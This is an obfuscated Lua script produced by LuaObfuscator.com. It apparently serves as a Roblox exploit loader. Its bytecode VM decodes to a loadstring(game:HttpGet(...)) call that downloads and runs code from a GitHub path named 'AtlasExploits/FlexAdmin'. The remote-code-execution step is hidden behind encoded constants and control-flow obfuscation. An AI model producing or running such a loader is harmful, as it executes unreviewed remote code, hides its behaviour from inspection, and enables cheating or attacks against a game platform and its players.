--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.9.16) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30)if (v1(v30,2)==79) then v19=v0(v3(v30,1,1));return "";else local v83=v2(v0(v30,16));if v19 then local v90=0;local v91;while true do if (v90==1) then return v91;end if (v90==0) then v91=v5(v83,v19);v19=nil;v90=1;end end else return v83;end end end);local function v20(v31,v32,v33)if v33 then local v84=(1637 -(1523 + 114)) -0 ;local v85;while true do if (v84==(0 -0)) then v85=(v31/((3 -1)^(v32-((2 + 0) -1))))%((621 -(555 + 64))^(((v33-(932 -(857 + 74))) -(v32-(569 -(367 + 201)))) + (928 -((304 -90) + 713)))) ;return v85-(v85%(1 + 0)) ;end end else local v86=2^(v32-(1 + (1065 -(68 + 997)))) ;return (((v31%(v86 + v86))>=v86) and 1) or (877 -(282 + 595)) ;end end local function v21()local v34=1270 -(226 + 1044) ;local v35;while true do if (v34==1) then return v35;end if (v34==(0 -0)) then v35=v1(v16,v18,v18);v18=v18 + ((27 + 91) -(32 + 85)) ;v34=1 + (957 -(892 + 65)) ;end end end local function v22()local v36=0 -0 ;local v37;local v38;while true do if (v36==(1 -0)) then return (v38 * (469 -213)) + v37 ;end if (v36==((859 -509) -(87 + 263))) then v37,v38=v1(v16,v18,v18 + 2 + 0 );v18=v18 + (182 -(67 + 113)) ;v36=1 + 0 ;end end end local function v23()local v39,v40,v41,v42=v1(v16,v18,v18 + (11 -8) );v18=v18 + (956 -(802 + 150)) ;return (v42 * (12211951 + 4565265)) + (v41 * (176444 -110908)) + (v40 * (464 -208)) + v39 ;end local function v24()local v43=v23();local v44=v23();local v45=998 -(915 + 82) ;local v46=(v20(v44,(440 -(145 + 293)) -1 ,12 + 8 ) * ((2 -0)^32)) + v43 ;local v47=v20(v44,21,1218 -(1069 + 118) );local v48=((v20(v44,72 -40 )==(1 -0)) and  -(1 + 0)) or 1 ;if (v47==(430 -(44 + 386))) then if (v46==(0 -(1486 -(998 + 488)))) then return v48 * 0 ;else v47=1 + 0 ;v45=791 -(368 + 135 + 288) ;end elseif (v47==(6433 -4386)) then return ((v46==(18 -(10 + 7 + 1))) and (v48 * ((3 -2)/(442 -(416 + 26))))) or (v48 * NaN) ;end return v8(v48,v47-(3266 -2243) ) * (v45 + (v46/((1 + 1)^((863 -(201 + 571)) -39)))) ;end local function v25(v49)local v50;if  not v49 then v49=v23();if (v49==(1138 -(116 + 1022))) then return "";end end v50=v3(v16,v18,(v18 + v49) -(4 -3) );v18=v18 + v49 ;local v51={};for v67=1, #v50 do v51[v67]=v2(v1(v3(v50,v67,v67)));end return v6(v51);end local v26=v23;local function v27(...)return {...},v12("#",...);end local function v28()local v52=0;local v53;local v54;local v55;local v56;local v57;local v58;local v59;local v60;while true do if (v52==0) then v53=1002 -(923 + 79) ;v54=nil;v52=1;end if (2==v52) then v57=nil;v58=nil;v52=1639 -(1373 + 263) ;end if (v52==(1001 -(451 + 549))) then v55=nil;v56=nil;v52=1 + 1 ;end if (v52==(5 -1)) then while true do if (v53==0) then local v96=0;while true do if ((0 -0)~=v96) then else v54=1384 -(746 + 638) ;v55=nil;v96=1;end if ((1 + 0)==v96) then v53=1 -0 ;break;end end end if (v53==(343 -(218 + 123))) then local v97=1581 -(1535 + 46) ;while true do if (0==v97) then v58=nil;v59=nil;v97=1 + 0 ;end if (v97~=1) then else v53=1 + 2 ;break;end end end if (v53==(561 -(306 + 254))) then local v98=0 + 0 ;while true do if (v98~=0) then else v56=nil;v57=nil;v98=1 -0 ;end if (v98==1) then v53=2;break;end end end if (3~=v53) then else v60=nil;while true do local v99=0;while true do if (v99==0) then if (v54~=0) then else local v142=1467 -(899 + 568) ;local v143;while true do if (v142==0) then v143=0;while true do if ((0 + 0)~=v143) then else v55={};v56={};v143=2 -1 ;end if (v143~=1) then else v57={};v54=604 -(268 + 335) ;break;end end break;end end end if (v54==(292 -(60 + 230))) then local v144=572 -(426 + 146) ;local v145;while true do if (v144==(0 + 0)) then v145=1456 -(282 + 1174) ;while true do if (v145==1) then for v157=812 -(569 + 242) ,v23() do local v158=0;local v159;local v160;while true do if (1==v158) then while true do if (v159~=0) then else v160=v21();if (v20(v160,1,2 -1 )==(0 + 0)) then local v171=0;local v172;local v173;local v174;local v175;while true do if (v171==2) then while true do if (v172==(1024 -(706 + 318))) then local v180=0;while true do if (v180==0) then local v186=1251 -(721 + 530) ;while true do if (v186==1) then v180=1;break;end if (v186==0) then v173=v20(v160,2,3);v174=v20(v160,4,6);v186=1;end end end if ((1272 -(945 + 326))==v180) then v172=2 -1 ;break;end end end if ((1 + 0)==v172) then local v181=700 -(271 + 429) ;while true do if (v181==1) then v172=2;break;end if (v181==0) then local v187=0;while true do if (v187==1) then v181=1 + 0 ;break;end if (v187~=(1500 -(1408 + 92))) then else v175={v22(),v22(),nil,nil};if (v173==0) then local v192=0;local v193;local v194;while true do if (v192~=1) then else while true do if ((1288 -(993 + 295))==v193) then v194=0;while true do if (v194==(0 + 0)) then v175[3]=v22();v175[1175 -(418 + 753) ]=v22();break;end end break;end end break;end if (v192==(0 + 0)) then v193=0;v194=nil;v192=1 + 0 ;end end elseif (v173==1) then v175[1 + 2 ]=v23();elseif (v173==(1 + 1)) then v175[532 -(406 + 123) ]=v23() -(2^16) ;elseif (v173==3) then local v197=1769 -(1749 + 20) ;local v198;while true do if (v197==(0 + 0)) then v198=0;while true do if (v198==0) then v175[1325 -(1249 + 73) ]=v23() -((1 + 1)^(1161 -(466 + 679))) ;v175[9 -5 ]=v22();break;end end break;end end end v187=1;end end end end end if (v172==(8 -5)) then if (v20(v174,1903 -(106 + 1794) ,3)~=(1 + 0)) then else v175[2 + 2 ]=v60[v175[11 -7 ]];end v55[v157]=v175;break;end if ((5 -3)==v172) then local v183=114 -(4 + 110) ;while true do if (v183~=(585 -(57 + 527))) then else v172=1430 -(41 + 1386) ;break;end if (v183==(103 -(17 + 86))) then if (v20(v174,1 + 0 ,1 -0 )==(2 -1)) then v175[168 -(122 + 44) ]=v60[v175[2]];end if (v20(v174,2 -0 ,6 -4 )~=1) then else v175[3 + 0 ]=v60[v175[3]];end v183=1;end end end end break;end if (v171~=(1 + 0)) then else local v177=0 -0 ;while true do if (0~=v177) then else v174=nil;v175=nil;v177=66 -(30 + 35) ;end if (1~=v177) then else v171=2;break;end end end if (v171==(0 + 0)) then local v178=1257 -(1043 + 214) ;while true do if (1==v178) then v171=3 -2 ;break;end if (v178==0) then v172=0;v173=nil;v178=1213 -(323 + 889) ;end end end end end break;end end break;end if (v158==(0 -0)) then v159=580 -(361 + 219) ;v160=nil;v158=321 -(53 + 267) ;end end end v54=3;break;end if ((0 + 0)==v145) then for v161=1,v59 do local v162=0;local v163;local v164;local v165;while true do if (v162~=(413 -(15 + 398))) then else local v166=0;local v167;while true do if (v166~=(982 -(18 + 964))) then else v167=0 -0 ;while true do if (v167~=1) then else v162=1;break;end if (v167==(0 + 0)) then local v176=0 + 0 ;while true do if (v176==(850 -(20 + 830))) then v163=0 + 0 ;v164=nil;v176=1;end if (v176~=1) then else v167=127 -(116 + 10) ;break;end end end end break;end end end if (v162==(1 + 0)) then v165=nil;while true do if (v163~=1) then else if (v164==1) then v165=v21()~=(738 -(542 + 196)) ;elseif (v164==(3 -1)) then v165=v24();elseif (v164~=3) then else v165=v25();end v60[v161]=v165;break;end if ((0 + 0)==v163) then local v169=0 + 0 ;local v170;while true do if (v169~=0) then else v170=0;while true do if (v170==1) then v163=1;break;end if (v170~=0) then else local v179=0 + 0 ;while true do if (v179~=(2 -1)) then else v170=2 -1 ;break;end if (v179==0) then v164=v21();v165=nil;v179=1552 -(1126 + 425) ;end end end end break;end end end end break;end end end v58[3]=v21();v145=406 -(118 + 287) ;end end break;end end end v99=3 -2 ;end if (v99==(1122 -(118 + 1003))) then if ((8 -5)~=v54) then else local v146=377 -(142 + 235) ;while true do if (v146==(0 -0)) then for v154=1,v23() do v56[v154-(1 + 0) ]=v28();end return v58;end end end if (1==v54) then v58={v55,v56,nil,v57};v59=v23();v60={};v54=2 + 0 ;end break;end end end break;end end break;end if (v52~=(3 + 0)) then else v59=nil;v60=nil;v52=4;end end end local function v29(v61,v62,v63)local v64=v61[1];local v65=v61[2];local v66=v61[3];return function(...)local v69=v64;local v70=v65;local v71=v66;local v72=v27;local v73=1;local v74= -1;local v75={};local v76={...};local v77=v12("#",...) -1 ;local v78={};local v79={};for v87=0,v77 do if (v87>=v71) then v75[v87-v71 ]=v76[v87 + 1 ];else v79[v87]=v76[v87 + 1 ];end end local v80=(v77-v71) + 1 ;local v81;local v82;while true do v81=v69[v73];v82=v81[1];if (v82<=3) then if (v82<=1) then if (v82>0) then local v100=0;local v101;local v102;local v103;local v104;while true do if (2==v100) then for v147=v101,v74 do v104=v104 + 1 ;v79[v147]=v102[v104];end break;end if (1==v100) then v74=(v103 + v101) -1 ;v104=0;v100=2;end if (v100==0) then v101=v81[2];v102,v103=v72(v79[v101](v13(v79,v101 + 1 ,v81[3])));v100=1;end end else do return;end end elseif (v82==2) then local v105=v81[2];v79[v105]=v79[v105](v13(v79,v105 + 1 ,v74));else v79[v81[2]]=v63[v81[3]];end elseif (v82<=5) then if (v82==4) then local v109=v81[2];local v110=v79[v81[3]];v79[v109 + 1 ]=v110;v79[v109]=v110[v81[4]];else local v114=0;local v115;local v116;local v117;local v118;local v119;while true do if (v114==2) then v79[v119 + 1 ]=v118;v79[v119]=v118[v81[4]];v73=v73 + 1 ;v81=v69[v73];v79[v81[2]]=v81[3];v73=v73 + 1 ;v114=3;end if (1==v114) then v81=v69[v73];v79[v81[2]]=v63[v81[3]];v73=v73 + 1 ;v81=v69[v73];v119=v81[2];v118=v79[v81[3]];v114=2;end if (v114==0) then v115=nil;v116,v117=nil;v118=nil;v119=nil;v79[v81[2]]=v63[v81[3]];v73=v73 + 1 ;v114=1;end if (v114==5) then v79[v81[2]]();v73=v73 + 1 ;v81=v69[v73];do return;end break;end if (v114==3) then v81=v69[v73];v119=v81[2];v116,v117=v72(v79[v119](v13(v79,v119 + 1 ,v81[3])));v74=(v117 + v119) -1 ;v115=0;for v150=v119,v74 do local v151=0;while true do if (v151==0) then v115=v115 + 1 ;v79[v150]=v116[v115];break;end end end v114=4;end if (v114==4) then v73=v73 + 1 ;v81=v69[v73];v119=v81[2];v79[v119]=v79[v119](v13(v79,v119 + 1 ,v74));v73=v73 + 1 ;v81=v69[v73];v114=5;end end end elseif (v82==6) then v79[v81[2]]();else v79[v81[2]]=v81[3];end v73=v73 + 1 ;end end;end return v29(v28(),{},v17)(...);end v15("LOL!043O00030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403443O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F41746C61734578706C6F6974732F466C657841646D696E2F6D61696E2F41646D696E00083O0012053O00013O00122O000100023O00202O00010001000300122O000300046O000100039O0000026O000100016O00017O00",v9(),...);
